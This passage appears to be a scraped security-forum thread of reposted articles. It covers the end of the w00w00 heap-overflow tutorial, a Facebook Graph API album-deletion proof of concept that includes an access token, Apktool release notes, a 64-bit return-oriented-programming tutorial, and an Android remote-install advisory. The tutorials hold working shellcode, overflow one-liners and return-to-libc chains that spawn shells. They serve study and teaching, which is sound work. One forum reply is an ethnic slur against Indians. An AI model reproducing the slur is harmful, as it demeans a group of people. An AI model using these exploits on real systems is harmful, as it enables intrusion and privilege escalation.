   /* ----------------------------- */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup SP */
   {
      index = BUFSIZE + 20 + i;
      buf[index] = (stackaddr >> (i * 8)) & 255;
   }

   /* ----------------------------- */

   /* reverse byte order (on a little endian system) (ntohl equiv) */
   for (i = 0; i < sizeof(u_long); i++) /* setup PC */
   {
      index = BUFSIZE + 24 + i;
      buf[index] = (argvaddr >> (i * 8)) & 255;
   }

   execl(VULPROG, VULPROG, buf, shellcode, NULL);
   return 0;
}
-----------------------------------------------------------------------------

Ouch, that was sloppy. But anyway, when we run this with a stack offset
of 36 and an argv[2] offset of 322, we get the following:

   [root /w00w00/heap/examples/vulpkgs/vulpkg4]# ./exploit4 36 322
   trying address 0xbffffcf6 for argv[2]
   trying address 0xbffffb90 for sp

   [vulprog] argv[2] = 0xbffffcf6
   [vulprog] sp = 0xbffffb90

   before:
   bx = 0x0, si = 0x40001fb0, di = 0x4000000f
   bp = 0xbffffb98, sp = 0xbffffb94, pc = 0x8048715

   after:
   bx = 0x1010101, si = 0x1010101, di = 0x1010101
   bp = 0xbffffb90, sp = 0xbffffb90, pc = 0xbffffcf6

   bash#

w00w00!

For those of you who are saying, "Okay, I see this works in a controlled
environment; but what about in the wild?": there is sensitive data on the
heap that can be overflowed. Examples include:

   functions                         reason
   ------------------------------------------------------------------
   1. *gets()/*printf(), *scanf()    __iob (FILE) structure in heap
   2. popen()                        __iob (FILE) structure in heap
   3. *dir() (readdir, seekdir, ...)
                                     DIR entries (dir/heap buffers)
   4. atexit()                       static/global function pointers
   5. strdup()                       allocates dynamic data in the heap
   6. getenv()                       stored data on heap
   7. tmpnam()                       stored data on heap
   8. malloc()                       chain pointers
   9. rpc callback functions         function pointers
   10. windows callback functions    func pointers kept on heap
   11. signal handler pointers       function pointers (note: unix tracks
                                     these in the kernel, not in the
                                     heap; cygnus (gcc for win) keeps
                                     them in the heap)

Now, you can definitely see some uses for these functions. Room allocated
for FILE structures in functions such as printf()'s, fgets()'s,
readdir()'s, seekdir()'s, etc. can be manipulated (buffers or function
pointers). atexit() has function pointers that will be called when the
program terminates. strdup() can store strings (such as filenames or
passwords) on the heap. malloc()'s own chain pointers (inside its pool)
can be manipulated to access memory it wasn't meant to reach. getenv()
stores data on the heap, which would allow us to modify something such as
$HOME after it's initially checked.

svc/rpc registration functions (librpc, libnsl, etc.) keep callback
functions stored on the heap. We will demonstrate overwriting Windows
callback functions and overwriting FILE (__iob) structures (with popen).
Once you know how to overwrite FILE structures with popen(), you can
quickly figure out how to do it with other functions (i.e., *printf,
*gets, *scanf, etc.), as well as DIR structures (because they are
similar).

Now for some case studies! Our two "real world" vulnerabilities will be
Solaris' tip and BSDI's crontab. The BSDI crontab vulnerability was
discovered by mudge of L0pht (see the L0pht 1996 Advisory Page). We're
reusing it because it's a textbook example of a heap-based overflow
(though we will use our own method of exploitation).

Our first case study will be the BSDI crontab heap-based overflow. We can
pass a long filename, which will overflow a static buffer. Above that
buffer in memory, we have a pwd (see pwd.h) structure!
This stores a user's user name, password, uid, gid, etc. By overwriting
the uid/gid field of the pwd, we can modify the privileges that crond
will run our crontab with (as soon as it tries to run our crontab). Our
crontab script could then create a suid root shell, because it will be
running with uid/gid 0. Here is our exploit code:

-----------------------------------------------------------------------------
-----------------------------------------------------------------------------

When we run it on a BSDI X.X machine, we get the following:

[Put exploit output here]

'tip' is run suid uucp on Solaris. It is possible to get root once uucp
privileges are gained (but that's outside the scope of this article). Tip
will overflow a static buffer when prompting for a file to send/receive.
Above the static buffer in memory is a jmp_buf. By overwriting the static
buffer and then causing a SIGINT, we can get shellcode executed (by
storing it in argv[]). To exploit successfully, we need to either connect
to a valid system, or create a "fake device" to which tip will connect.
Here is our tip exploit:

-----------------------------------------------------------------------------
-----------------------------------------------------------------------------

When we run it on a Solaris 2.7 machine, we get the following:

[Put exploit output here]

Possible Fixes (Workarounds)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Obviously, the best prevention for heap-based overflows is writing good
code! Similar to stack-based overflows, there is no real way of preventing
heap-based overflows.

We can get a copy of the bounds checking gcc/egcs (which should locate
most potential heap-based overflows) developed by Richard Jones and Paul
Kelly. This program can be downloaded from Richard Jones's homepage at
http://www.annexia.demon.co.uk. It detects overruns that might be missed
by human error. One example they use is: "int array[10]; for (i = 0;
i <= 10; i++) array[i] = 1". I have never used it.
Note: For Windows, one could use NuMega's BoundsChecker, which essentially
performs the same job as the bounds checking gcc.

We can always make a non-executable heap patch (as mentioned earlier, most
systems have an executable heap). During a conversation I had with Solar
Designer, he mentioned that the main problems with a non-executable heap
would involve compilers, interpreters, etc.

Note: I added a note section here to reiterate the point that a
non-executable heap does NOT prevent heap overflows at all. It means we
can't execute instructions in the heap. It does NOT prevent us from
overwriting data in the heap.

Likewise, another possibility is to make a "HeapGuard", which would be the
equivalent of Cowan's StackGuard mentioned earlier. He (et al.) also
developed something called "MemGuard", but it's a misnomer. Its function
is to prevent a return address on the stack from being overwritten (via
canary values). It does nothing to prevent overflows in the heap or bss.

Acknowledgements
~~~~~~~~~~~~~~~~

There has been a significant amount of work on heap-based overflows in
the past. We ought to name some other people who have published work
involving heap/bss-based overflows (though our work wasn't based on them).

Solar Designer: SuperProbe exploit (function pointers), color_xterm
exploit (struct pointers), WebSite (pointer arrays), etc.

L0pht: Internet Explorer 4.01 vulnerability (dildog), BSDI crontab
exploit (mudge), etc.

Some others who have published exploits for heap-based overflows (thanks
to stranJer for pointing them out) are Joe Zbiciak (solaris ps) and Adam
Morrison (stdioflow). I'm sure there are many others, and I apologize for
excluding anyone.

I'd also like to thank the following people who had some direct
involvement in this article: str (stranJer), halflife, and jobe. Indirect
involvements: Solar Designer, mudge, and other w00w00 affiliates.
Other good sources of info include: as/gcc/ld info files (/usr/info/*),
BugTraq archives (http://www.geek-girl.com/bugtraq), w00w00
(http://www.w00w00.org), and L0pht (http://www.l0pht.com), etc.

Epilogue:

Most people who claim their systems are "secure" are saying so out of a
lack of knowledge (ignorant seemed a little too strong). Assuming security
leads to a false sense of security (e.g., azrael.phrack.com has remote
vulnerabilities involving heap-based overflows that have gone unnoticed
for quite a while). Hopefully, people will experiment with heap-based
overflows, and in turn, will become more aware that the problems exist.
We need to realize that the problems are out there, waiting to be fixed.

Thanks for reading! We hope you've enjoyed it! You can e-mail me at
shok@dataforce.net, or mattc@repsec.com. See the w00w00 (www.w00w00.org)
web site, also!

------------------------------------------------------------------------------
Matt Conover (a.k.a. Shok) & w00w00 Security Team

[ http://www.w00w00.org, w00w00 Security Development (WSD) ]
[ See the URL above for information on: what w00w00 is, our ]
[ security projects (all available online), some of our     ]
[ articles, and more. Enjoy!                                ]

Sursa: http://www.cgsecurity.org/exploit/heaptut.txt
  2. Nytro

    Unban paxnwo

    Pax has come a long way in the last few years (uiiu). Jokes aside, he's an okay guy. Even black_death has come a long way. My heart swelled when I heard him asking something about a "port" (the one that goes up to 65535, not the one in Constanta) <3
  3. La cum arata ar fi bine sa fie Part 1 din 700. Nu a facut nimic indianu asta nespalat. Unde e analiza? Toti indienii sunt jegosi. Si prosti. Prosti de put.
  4. Homepage: Exploit Pack - Security. It was presented at Blackhat 2014, I think.
  5. I think we had reported this one as well.
  6. How I Hacked Your Facebook Photos

What if your photos got deleted without your knowledge? Obviously that's
very upsetting, isn't it? Yup, this post is about a vulnerability I found
that allows a malicious user to delete any photo album on Facebook. Any
photo album owned by a user, a page, or a group could be deleted.

The Graph API is the primary way for developers to read and write users'
data. All current Facebook apps use the Graph API. In general, the Graph
API requires an access token to read or write users' data. Read more
about the Graph API here.

According to the Facebook developer documentation, photo albums cannot be
deleted using the album node in the Graph API. I tried to delete one of
my photo albums using a Graph Explorer access token.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD

Response:

{"error":{"message":"(#200) Application does not have the capability to
make this API call.","type":"OAuthException","code":200}}

Why? Because this application doesn't have the capability to delete photo
albums. But we need to note the error message: it tells us that some
other application does have the capability to make this API call.

I decided to try it with a Facebook for mobile access token, because we
can see a delete option for all photo albums in the Facebook mobile
application, can't we? Yeah, and it also uses the same Graph API. So I
took an album id and a Facebook for Android access token of mine and
tried it.
I was very curious to see the result.

Request:

DELETE /518171421550249 HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Facebook_for_Android_Access_Token>

Response:

true

OMG, the album got deleted! So I had access to delete all of your
Facebook photos (photos which are public, or photos I could see) lol.

I immediately reported this bug to the Facebook security team. They were
very fast in identifying the issue, and a fix was in place less than 2
hours from the acknowledgement of the report.

Final Proof Of Concept:

Request:

DELETE /<Victim's_photo_album_id> HTTP/1.1
Host: graph.facebook.com
Content-Length: 245

access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

If you aren't sure about how to do it, please see this video.

First acknowledgement from Facebook security team. Acknowledgement of the
fix, and they rewarded me $12500 USD for reporting this vulnerability.
Now it's completely fixed. Thank you, Facebook Security Team, for running
the bug bounty program and for quickly fixing this issue. Soon I'll get
listed in the 2015 HALL OF FAME: https://www.facebook.com/whitehat/thanks

Posted by Laxman Muthiyah at 00:30

Sursa: http://www.7xter.com/2015/02/how-i-hacked-your-facebook-photos.html
  7. Apktool 2.0.0 RC4 Released

February 12, 2015

Apktool 2.0.0 RC4 has been released. I was going to tag this version as
2.0 Gold, but since RC3 introduced a completely rewritten aapt that
caused a plethora of errors, I've decided to hold another release
candidate. This release contained 47 commits by 6 people, 27 of the
commits belonging to the updated smali release.

Notable in this release is the fix for aapt's implicit adding of
qualifiers. This caused resource directories to change from drawable-hdpi
to drawable-hdpi-v11, as an example. In theory this shouldn't have broken
anything, but bug reports proved otherwise. Since Apktool isn't your
"first" tool to build an APK, I determined it was best to just skip this
step of adding qualifiers. 0xD34D from Cyanogen helped me figure that out.

Changes since RC3

  - Updated to smali/baksmali 2.0.5
  - [#685] - Fixed selecting invalid attrs from Lollipop APKs
  - [#713] - Added support for APKs that utilized Shared Resources
  - [#329] - Fixed issue identifying strings that were named like
    filepaths as ResFiles
  - [#590] - Fixed isolated issue with segfaulting apks
  - [#545] - Fixed issue with undefined attributes
  - [#702] - Fixed invalid treating of MNC_ZERO which caused duplicate
    resources
  - [#744] - Fixed ugly warnings of "Cleaning up unclosed ZipFile...."
  - [#757] - Fixed downloading gradle over http, instead of https
  - [#402] - Fixed issue with framework storage when user has no access
    to $HOME

Notes

There was no framework update in RC4, but if RC4 is your first version,
please delete the file at $HOME/apktool/framework/1.apk before trying RC4.

Download

Apktool 2.0.0 RC4 - md5 672f12efc5ffee79f3670f36cd6bbb64

Rename to apktool.jar and follow the Instruction Guide if you need help.

Links

Github | Bug Tracker | XDA Thread

Sursa: http://connortumbleson.com/2015/02/12/apktool-2-0-0-rc4-released/
  8. 64-bit Linux Return-Oriented Programming

Nobody's perfect. Particularly not programmers. Some days, we spend half
our time fixing mistakes we made in the other half. And that's when we're
lucky: often, a subtle bug escapes unnoticed into the wild, and we only
learn of it after a monumental catastrophe.

Some disasters are accidental. For example, an unlucky chain of events
might result in the precise conditions needed to trigger an overlooked
logic error. Other disasters are deliberate. Like an accountant abusing a
tax loophole lurking in a labyrinth of complex rules, an attacker might
discover a bug, then exploit it to take over many computers.

Accordingly, modern systems are replete with security features designed
to prevent evildoers from exploiting bugs. These safeguards might, for
instance, hide vital information, or halt execution of a program as soon
as they detect anomalous behaviour.

Executable space protection is one such defence. Unfortunately, it is an
ineffective defence. In this guide, we show how to circumvent executable
space protection on 64-bit Linux using a technique known as
return-oriented programming.

Some assembly required

We begin our journey by writing assembly to launch a shell via the execve
system call. For backwards compatibility, 32-bit Linux system calls are
supported in 64-bit Linux, so we might think we can reuse shellcode
targeted for 32-bit systems. However, the execve syscall takes a memory
address holding the NUL-terminated name of the program that should be
executed. Our shellcode might be injected someplace that requires us to
refer to memory addresses larger than 32 bits. Thus we must use 64-bit
system calls. The following may aid those accustomed to 32-bit assembly.
                   32-bit syscall                64-bit syscall
  instruction      int $0x80                     syscall
  syscall number   EAX, e.g. execve = 0xb        RAX, e.g. execve = 0x3b
  up to 6 inputs   EBX, ECX, EDX, ESI, EDI, EBP  RDI, RSI, RDX, R10, R8, R9
  over 6 inputs    in RAM; EBX points to them    forbidden
  example          mov $0xb, %eax                mov $0x3b, %rax
                   lea string_addr, %ebx         lea string_addr, %rdi
                   mov $0, %ecx                  mov $0, %rsi
                   mov $0, %edx                  mov $0, %rdx
                   int $0x80                     syscall

We inline our assembly code in a C file, which we call shell.c:

int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
");
}

No matter where in memory our code winds up, the call-pop trick will load
the RDI register with the address of the "/bin/sh" string. The needle0 and
needle1 labels are to aid searches later on; so is the 0xdeadbeef constant
(though since x86 is little-endian, it will show up as EF BE AD DE
followed by 4 zero bytes).
For simplicity, we're using the API incorrectly; the second and third
arguments to execve are supposed to point to NULL-terminated arrays of
pointers to strings (argv[] and envp[]). However, our system is forgiving:
running "/bin/sh" with NULL argv and envp succeeds:

ubuntu:~$ gcc shell.c
ubuntu:~$ ./a.out
$

In any case, adding argv and envp arrays is straightforward.

The shell game

We extract the payload we wish to inject. Let's examine the machine code:

$ objdump -d a.out | sed -n '/needle0/,/needle1/p'
00000000004004bf <needle0>:
  4004bf:  eb 0e                  jmp    4004cf <there>

00000000004004c1 <here>:
  4004c1:  5f                     pop    %rdi
  4004c2:  48 31 c0               xor    %rax,%rax
  4004c5:  b0 3b                  mov    $0x3b,%al
  4004c7:  48 31 f6               xor    %rsi,%rsi
  4004ca:  48 31 d2               xor    %rdx,%rdx
  4004cd:  0f 05                  syscall

00000000004004cf <there>:
  4004cf:  e8 ed ff ff ff         callq  4004c1 <here>
  4004d4:  2f                     (bad)
  4004d5:  62                     (bad)
  4004d6:  69 6e 2f 73 68 00 ef   imul   $0xef006873,0x2f(%rsi),%ebp

00000000004004dc <needle1>:

On 64-bit systems, the code segment is usually placed at 0x400000, so in
the binary, our code starts at offset 0x4bf and finishes right before
offset 0x4dc. This is 29 bytes:

$ echo $((0x4dc-0x4bf))
29

We round this up to the next multiple of 8 to get 32, then run:

$ xxd -s0x4bf -l32 -p a.out shellcode

Let's take a look:

$ cat shellcode
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead

Learn bad C in only 1 hour!

An awful C tutorial might contain an example like the following victim.c:

#include <stdio.h>

int main() {
  char name[64];
  puts("What's your name?");
  gets(name);
  printf("Hello, %s!\n", name);
  return 0;
}

Thanks to the cdecl calling convention for x86 systems, if we input a
really long string, we'll overflow the name buffer and overwrite the
return address. Enter the shellcode followed by the right bytes, and the
program will unwittingly run it when trying to return from the main
function.

The Three Trials of Code Injection

Alas, stack smashing is much harder these days.
On my stock Ubuntu 12.04 install, there are 3 countermeasures:

  - GCC Stack-Smashing Protector (SSP), aka ProPolice: the compiler
    rearranges the stack layout to make buffer overflows less dangerous
    and inserts runtime stack integrity checks.

  - Executable space protection (NX): attempting to execute code in the
    stack causes a segmentation fault. This feature goes by many names,
    e.g. Data Execution Prevention (DEP) on Windows, or Write XOR Execute
    (W^X) on BSD. We call it NX here, because 64-bit Linux implements
    this feature with the CPU's NX bit ("Never eXecute").

  - Address Space Layout Randomization (ASLR): the location of the stack
    is randomized every run, so even if we can overwrite the return
    address, we have no idea what to put there.

We'll cheat to get around them. Firstly, we disable the SSP:

$ gcc -fno-stack-protector -o victim victim.c

Next, we disable executable space protection:

$ execstack -s victim

Lastly, we disable ASLR when running the binary:

$ setarch `arch` -R ./victim
What's your name?
World
Hello, World!

One more cheat. We'll simply print the buffer location:

#include <stdio.h>

int main() {
  char name[64];
  printf("%p\n", name);  // Print address of buffer.
  puts("What's your name?");
  gets(name);
  printf("Hello, %s!\n", name);
  return 0;
}

Recompile and run it:

$ setarch `arch` -R ./victim
0x7fffffffe090
What's your name?

The same address should appear on subsequent runs. We need it in
little-endian:

$ a=`printf %016x 0x7fffffffe090 | tac -rs..`
$ echo $a
90e0ffffff7f0000

Success! At last, we can attack our vulnerable program:

$ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) | setarch `arch` -R ./victim

The shellcode takes up the first 32 bytes of the buffer. The 80 zeroes in
the printf represent 40 zero bytes, 32 of which fill the rest of the
buffer, and the remaining 8 overwrite the saved location of the RBP
register. The next 8 overwrite the return address, and point to the
beginning of the buffer where our shellcode lies.
Hit Enter a few times, then type "ls" to confirm that we are indeed in a
running shell. There is no prompt, because the standard input is provided
by cat, and not the terminal (/dev/tty).

The Importance of Being Patched

Just for fun, we'll take a detour and look into ASLR. In the old days,
you could read the ESP register of any process by looking at
/proc/pid/stat. This leak was plugged long ago. (Nowadays, a process can
spy on a given process only if it has permission to ptrace() it.)

Let's pretend we're on an unpatched system, as it's more satisfying to
cheat less. Also, we see first-hand the importance of being patched, and
why ASLR needs secrecy as well as randomness. Inspired by a presentation
by Tavis Ormandy and Julien Tinnes, we run:

$ ps -eo cmd,esp

First, we run the victim program without ASLR:

$ setarch `arch` -R ./victim

and in another terminal:

$ ps -o cmd,esp -C victim
./victim            ffffe038

Thus while the victim program is waiting for user input, its stack
pointer is 0x7fffffffe038. We calculate the distance from this pointer to
the name buffer:

$ echo $((0x7fffffffe090-0x7fffffffe038))
88

We are now armed with the offset we need to defeat ASLR on older systems.
After running the victim program with ASLR reenabled:

$ ./victim

we can find the relevant pointer by spying on the process, then adding
the offset:

$ ps -o cmd,esp -C victim
./victim            43a4b538
$ printf %x\\n $((0x7fff43a4b538+88))
7fff43a4b590

Perhaps it's easiest to demonstrate with named pipes:

$ mkfifo pip
$ cat pip | ./victim

In another terminal, we type:

$ sp=`ps --no-header -C victim -o esp`
$ a=`printf %016x $((0x7fff$sp+88)) | tac -r -s..`
$ ( ( cat shellcode ; printf %080d 0 ; echo $a ) | xxd -r -p ; cat ) > pip

and after hitting enter a few times, we can enter shell commands.

Executable space perversion

Recompile the victim program without running the execstack command.
Alternatively, reactivate executable space protection by running:

$ execstack -c victim

Try attacking this binary as above.
Our efforts are thwarted as soon as the program jumps to our injected
shellcode in the stack. The whole area is marked nonexecutable, so we get
shut down.

Return-oriented programming deftly sidesteps this defence. The classic
buffer overflow exploit fills the buffer with code we want to run;
return-oriented programming instead fills the buffer with addresses of
snippets of code we want to run, turning the stack pointer into a sort of
indirect instruction pointer. The snippets of code are handpicked from
executable memory: for example, they might be fragments of libc. Hence
the NX bit is powerless to stop us.

In more detail:

  1. We start with SP pointing to the start of a series of addresses. A
     RET instruction kicks things off.

  2. Forget RET's usual meaning of returning from a subroutine. Instead,
     focus on its effects: RET jumps to the address in the memory
     location held by SP, and increments SP by 8 (on a 64-bit system).

  3. After executing a few instructions, we encounter a RET. See step 2.

In return-oriented programming, a sequence of instructions ending in RET
is called a gadget.

Go go gadgets

Our mission is to call the libc system() function with "/bin/sh" as the
argument. We can do this by calling a gadget that assigns a chosen value
to RDI, then jumping to the system() libc function. First, where's libc?

$ locate libc.so
/lib/i386-linux-gnu/libc.so.6
/lib/x86_64-linux-gnu/libc.so.6
/lib32/libc.so.6
/usr/lib/x86_64-linux-gnu/libc.so

My system has a 32-bit and a 64-bit libc. We want the 64-bit one; that's
the second on the list. Next, what kind of gadgets are available anyway?

$ objdump -d /lib/x86_64-linux-gnu/libc.so.6 | grep -B5 ret

The selection is reasonable, but our quick-and-dirty search only finds
intentional snippets of code. We can do better. In our case, we would
very much like to execute:

pop %rdi
retq

while the pointer to "/bin/sh" is at the top of the stack. This would
assign the pointer to RDI before advancing the stack pointer.
The corresponding machine code is the two-byte sequence 0x5f 0xc3, which
ought to occur somewhere in libc. Sadly, I know of no widespread Linux
tool that searches a file for a given sequence of bytes; most tools seem
oriented towards text files and expect their inputs to be organized with
newlines. (I'm reminded of Rob Pike's "Structural Regular Expressions".)
We settle for an ugly workaround:

$ xxd -c1 -p /lib/x86_64-linux-gnu/libc.so.6 | grep -n -B1 c3 | grep 5f -m1 | awk '{printf"%x\n",$1-1}'
22a12

In other words:

  1. Dump the library, one hex code per line.

  2. Look for "c3", and print one line of leading context along with the
     matches. We also print the line numbers.

  3. Look for the first "5f" match within the results.

  4. As line numbers start from 1 and offsets start from 0, we must
     subtract 1 to get the latter from the former. Also, we want the
     address in hexadecimal. Asking Awk to treat the first argument as a
     number (due to the subtraction) conveniently drops all the
     characters after the digits, namely the "-5f" that grep outputs.

We're almost there. If we overwrite the return address with the following
sequence:

  - libc's address + 0x22a12
  - address of "/bin/sh"
  - address of libc's system() function

then on executing the next RET instruction, the program will pop the
address of "/bin/sh" into RDI thanks to the first gadget, then jump to
the system function.

Many happy returns

In one terminal, run:

$ setarch `arch` -R ./victim

And in another:

$ pid=`ps -C victim -o pid --no-headers | tr -d ' '`
$ grep libc /proc/$pid/maps
7ffff7a1d000-7ffff7bd0000 r-xp 00000000 08:05 7078182  /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7bd0000-7ffff7dcf000 ---p 001b3000 08:05 7078182  /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dcf000-7ffff7dd3000 r--p 001b2000 08:05 7078182  /lib/x86_64-linux-gnu/libc-2.15.so
7ffff7dd3000-7ffff7dd5000 rw-p 001b6000 08:05 7078182  /lib/x86_64-linux-gnu/libc-2.15.so

Thus libc is loaded into memory starting at 0x7ffff7a1d000.
That gives us our first ingredient: the address of the gadget is
0x7ffff7a1d000 + 0x22a12.

Next we want "/bin/sh" somewhere in memory. We can proceed similarly to
before and place this string at the beginning of the buffer. From before,
its address is 0x7fffffffe090.

The final ingredient is the location of the system library function.

$ nm -D /lib/x86_64-linux-gnu/libc.so.6 | grep '\<system\>'
0000000000044320 W system

Gotcha! The system function lives at 0x7ffff7a1d000 + 0x44320. Putting it
all together:

$ (echo -n /bin/sh | xxd -p; printf %0130d 0; printf %016x $((0x7ffff7a1d000+0x22a12)) | tac -rs..; printf %016x 0x7fffffffe090 | tac -rs..; printf %016x $((0x7ffff7a1d000+0x44320)) | tac -rs..) | xxd -r -p | setarch `arch` -R ./victim

Hit enter a few times, then type in some commands to confirm this indeed
spawns a shell. There are 130 0s this time, which xxd turns into 65 zero
bytes. This is exactly enough to cover the rest of the buffer after
"/bin/sh" as well as the pushed RBP register, so that the very next
location we overwrite is the top of the stack.

Debriefing

In our brief adventure, ProPolice is the best defence. It tries to move
arrays to the highest parts of the stack, so less can be achieved by
overflowing them. Additionally, it places certain values at the ends of
arrays, which are known as canaries. It inserts checks before return
instructions that halt execution if the canaries are harmed. We had to
disable ProPolice completely to get started.

ASLR also defends against our attack, provided there is sufficient
entropy and the randomness is kept secret. This is in fact rather tricky.
We saw how older systems leaked information via /proc. In general,
attackers have devised many ingenious methods to learn addresses that are
meant to be hidden.

Last, and least, we have executable space protection. It turned out to be
toothless. So what if we can't run code in the stack? We'll simply point
to code elsewhere and run that instead!
We used libc, but in general, there is usually some corpus of code we can
raid. For example, researchers compromised a voting machine with
extensive executable space protection, turning its own code against it.

Funnily enough, the cost of each measure seems inversely proportional to
its benefit:

  - Executable space protection requires special hardware (the NX bit)
    or expensive software emulation.

  - ASLR requires cooperation from many parties. Programs and libraries
    alike must be loaded in random addresses. Information leaks must be
    plugged.

  - ProPolice requires a compiler patch.

Security theater

One may ask: if executable space protection is so easily circumvented, is
it worth having? Somebody must have thought so, because it is so
prevalent now. Perhaps it's time to ask: is executable space protection
worth removing?

Is executable space protection better than nothing? We just saw how
trivial it is to stitch together shreds of existing code to do our dirty
work. We barely scratched the surface: with just a few gadgets, any
computation is possible. Furthermore, there are tools that mine libraries
for gadgets, and compilers that convert an input language into a series
of addresses, ready for use on an unsuspecting non-executable stack. A
well-armed attacker may as well forget executable space protection even
exists.

Therefore, I argue executable space protection is worse than nothing.
Aside from being high-cost and low-benefit, it segregates code from data.
As Rob Pike puts it:

  This flies in the face of the theories of Turing and von Neumann, which
  define the basic principles of the stored-program computer. Code and
  data are the same, or at least they can be.

But worse still are its implications for programmers. Executable space
protection interferes with self-modifying code, which is invaluable for
just-in-time compiling, and for miraculously breathing new life into
ancient calling conventions set in stone.
In a paper describing how to add nested functions to C despite its simple
calling convention and thin pointers, Thomas Breuel observes:

  There are, however, some architectures and/or operating systems that
  forbid a program to generate and execute code at runtime. We consider
  this restriction arbitrary and consider it poor hardware or software
  design. Implementations of programming languages such as FORTH, Lisp,
  or Smalltalk can benefit significantly from the ability to generate or
  modify code quickly at runtime.

Epilogue

Many thanks to Hovav Shacham, who first brought return-oriented
programming to my attention. He co-authored a comprehensive introduction
to return-oriented programming. Also, see the technical details of how
return-oriented programming usurped a voting machine.

We focused on a specific attack. The defences we ran into can be much
less effective for other kinds of attacks. For example, ASLR has a hard
time fending off heap spraying.

Return-to-libc

Return-oriented programming is a generalization of the return-to-libc
attack, which calls library functions instead of gadgets. In 32-bit
Linux, the C calling convention is helpful, since arguments are passed on
the stack: all we need to do is rig the stack so it holds our arguments
and the address of the library function. When RET is executed, we're in
business.

However, the 64-bit C calling convention is identical to that of 64-bit
system calls, except RCX takes the place of R10, and more than 6
arguments may be present (any extras are placed on the stack in
right-to-left order). Overflowing the buffer only allows us to control
the contents of the stack, and not the registers, complicating
return-to-libc attacks. The new calling convention still plays nice with
return-oriented programming, because gadgets can manipulate registers.

GDB

Just as builders remove the scaffolding after finishing a skyscraper, I
omitted the GDB sessions which helped me along the way.
Did you think I could get these exploits byte-perfect the first time? I
wish!

Speaking of which, I'm almost certain I've never used a debugger to
debug! I've only used them to program in assembly, to investigate
binaries for which I lacked the source, and now, for buffer overflow
exploits. A quote from Linus Torvalds comes to mind:

  I don't like debuggers. Never have, probably never will. I use gdb all
  the time, but I tend to use it not as a debugger, but as a disassembler
  on steroids that you can program.

as does another from Brian Kernighan:

  The most effective debugging tool is still careful thought, coupled
  with judiciously placed print statements.

I'm unsure if I'll ever write about GDB, since so many guides already
exist. For now, I'll list a few choice commands:

$ gdb victim
start < shellcode
disas
break *0x00000000004005c1
cont
p $rsp
ni
si
x/10i 0x400470

GDB helpfully places the code deterministically, though the location it
chooses differs slightly from the shell's choice when ASLR is disabled.

Transcripts

I've summarized the above in a couple of shell scripts:

  - classic.sh: the classic buffer overflow attack.
  - rop.sh: the return-oriented programming version.

They work on my system (Ubuntu 12.04 on x86_64).

Sursa: http://crypto.stanford.edu/~blynn/rop/
  9. How to remotely install malicious apps on Android devices

by Pierluigi Paganini on February 13th, 2015

Security researchers discovered how to install and launch malicious
applications remotely on Android devices by exploiting two flaws.

Security researchers have uncovered a couple of vulnerabilities in the
Google Play Store that could allow cyber criminals to install and launch
malicious apps remotely on Android mobile devices. The expert Tod
Beardsley, technical lead for the Metasploit Framework at Rapid7,
explained that attackers can install any arbitrary app from the Play
store onto a victim's device, even without consent. This is possible by
combining the exploitation of an X-Frame-Options (XFO) vulnerability with
an Android WebView (Jelly Bean) flaw.

The flaw affects mobile devices running Android version 4.3 Jelly Bean
and earlier; devices running third-party browsers are also vulnerable.
The researcher reported that the web browser in Android 4.3 and prior
versions is vulnerable to a Universal Cross-Site Scripting (UXSS) attack,
while the Google Play Store is vulnerable to a Cross-Site Scripting (XSS)
flaw. In the UXSS attack scenario, hackers exploit client-side
vulnerabilities affecting a web browser or browser extensions to run an
XSS attack, which allows the execution of malicious code, bypassing
security protection mechanisms in the web browser.

"Users of these platforms may also have installed vulnerable aftermarket
browsers," Beardsley wrote in a blog post on Tuesday. "Of the vulnerable
population, it is expected that many users are habitually signed into
Google services, such as Gmail or YouTube. These mobile platforms are the
ones most at risk.
Other browsers may also be affected.” “Until the Google Play store XFO [X-Frame-Options] gap is mitigated, users of these web applications who habitually sign in to their Google Account will remain vulnerable.” The expert provided the JavaScript and Ruby code that could be used to get a response from the play.google.com domain without an appropriate XFO header. Rapid7 has already published a Metasploit module to exploit the flaw, Module for R7-2015-02 #4742, which has been made public on GitHub. “This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android’s open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store’s web interface fails to enforce an X-Frame-Options: DENY header (XFO) on some error pages, and therefore can be targeted for script injection. As a result, this leads to remote code execution through Google Play’s remote installation feature, as any application available on the Google Play store can be installed and launched on the user’s device. This module requires that the user is logged into Google with a vulnerable browser.” reads the advisory.

To mitigate the security issue:

    Use a web browser that is not affected by UXSS flaws (i.e. Google Chrome, Mozilla Firefox or Dolphin).
    Log out of the Google Play store account in order to avoid the vulnerability.

Pierluigi Paganini (Security Affairs – Google Android, hacking) Sursa: http://securityaffairs.co/wordpress/33456/hacking/remotely-hack-android.html
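The XFO gap described in the advisory can be checked mechanically: a page is frameable (and thus a candidate for this kind of script injection) when its response carries no effective X-Frame-Options header. A minimal sketch of such a check, assuming you already have the response headers as a dict — the header sets shown are illustrative, not real responses from play.google.com:

```python
def frameable(headers):
    """Return True if the response lacks an effective X-Frame-Options header,
    i.e. the page could be embedded in an attacker-controlled frame."""
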